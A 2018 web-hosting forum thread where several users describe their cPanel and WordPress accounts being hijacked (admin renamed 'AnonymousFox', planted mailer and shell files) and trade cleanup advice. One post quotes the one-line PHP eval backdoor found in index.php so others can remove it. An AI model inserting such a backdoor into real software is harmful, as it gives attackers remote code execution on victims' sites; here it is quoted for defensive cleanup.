hdkw1996 Posted July 21, 2018
Suddenly I can't log in to my account on username hdkw1996. It shows as invalid login, then I tried to reset the password and log in again, but it didn't work at all. Please help me... My databases are on the server.
danval Posted July 21, 2018
Hi, the same thing started happening to me yesterday. I have a WordPress site on Tommy and I couldn't log in to either cPanel or the WordPress administration. After resetting my password, I could log in to cPanel. I checked the WordPress database and I discovered that the admin user login was renamed and the password changed. These changes were not made by me, so I think the site has been hacked (and so has my cPanel account). I thought this was only my problem, but a family member who has a WordPress blog on HelioHost too suffered the same problem. The WordPress admin user was renamed to the same login as mine and access to cPanel was not possible. Then we had to reset the cPanel password to fix it. Seemingly the attack only affects the passwords, not files, and the database is in a good state. Anyway, I plan to restore a full backup of the site to ensure that everything is good. Does anyone have the same problem? Best Regards,
dream11 Posted July 21, 2018
Same problem there. I tried to open cPanel, no luck. I know the password was correct so I didn't reset it. A few minutes later I couldn't even try to log in, and none of my websites loaded; the problem was the server blocking my IP for trying too many times. Now I have reset the cPanel password, and I can't log in to WP. They also reset the WordPress login; the username was changed to "AnonymousFox". What a shame. You have a shop and they can reset the PayPal account to get the payments, and download all your clients' data. So what if you reset it back? They can still make it happen again if the bug is not patched.
Edited July 21, 2018 by dream11
danval Posted July 21, 2018
Yes, 'AnonymousFox' was the same administrator user rename as mine. I have installed Wordfence on my WordPress site. Thanks to the plugin I found out that a suspicious administrator login was made. I have done a scan from Wordfence, and I have the WordPress installation modified:
New file: wp-admin/2125719357.php
New file: wp-content/1205929475.php
New file: wp-admin/php.ini
Modified file: index.php
dream11 Posted July 21, 2018
And what are the changes made to php.ini and index.php? I can delete the other files, but I don't know what changes were made to the ini and php. Of the other two new files, one is a password-protected PHP mailer, and the other one is crypted shell access. This has clearly been made for phishing.
Edited July 21, 2018 by dream11
danval Posted July 21, 2018
In "index.php", remove this code at the start of the file:
<?php eval($_POST['475454656']); ?>
The "php.ini" must be deleted because it does not belong to WordPress. I think these are the only changes that were made, but the best solution is to restore a recent full backup of the site (files and database) if you have one. Also, this doesn't prevent the hack from happening again in the future, because it's necessary to know where the security hole is...
dream11 Posted July 21, 2018
Thanks. To you, does it look like a WordPress hack or a server hack? The fact that they changed the cPanel scared me a bit, since they have access to do anything.
dream11 Posted July 21, 2018
Done. Sadly, I don't have backups as far as I remember.
Edited July 21, 2018 by dream11
usr8481 Posted July 21, 2018
And my IP was blocked... I restored my HelioHost account password but I have to wait until someone unblocks my IP.
Edited July 21, 2018 by usr8481
usr8481 Posted July 21, 2018
screenshot
Edited July 21, 2018 by usr8481
wolstech Posted July 21, 2018
WordPress is well known for severe security issues and is laughably easy to compromise, especially because it's usually not kept updated, and because its extensions are usually also full of holes. We recommend not using WP for these and many other reasons. It's a leading cause of hacked sites, high load suspensions, spam suspensions, and phishing bans here at HelioHost. Finding another CMS is your best option. If you really want to keep WP, delete your installation, reinstall using updated components, don't use dubious themes and extensions from random websites (many are actually disguised backdoors) and make sure you keep it updated going forward. Otherwise this issue is just going to come back. Also, that leafmailer is a spambot (we usually ban accounts that have it, please get rid of that ASAP or you'll lose your account).
usr8481 Posted July 21, 2018
Unblock IP please - https://www.helionet.org/index/topic/33546-unblock-ip/
dream11 Posted July 21, 2018
I am out of the server again, that sucks. I have my WordPress up to date, must be a plugin? Argh.
dream11 Posted July 21, 2018
He is even playing with my WP! He changed the slogan, OMG...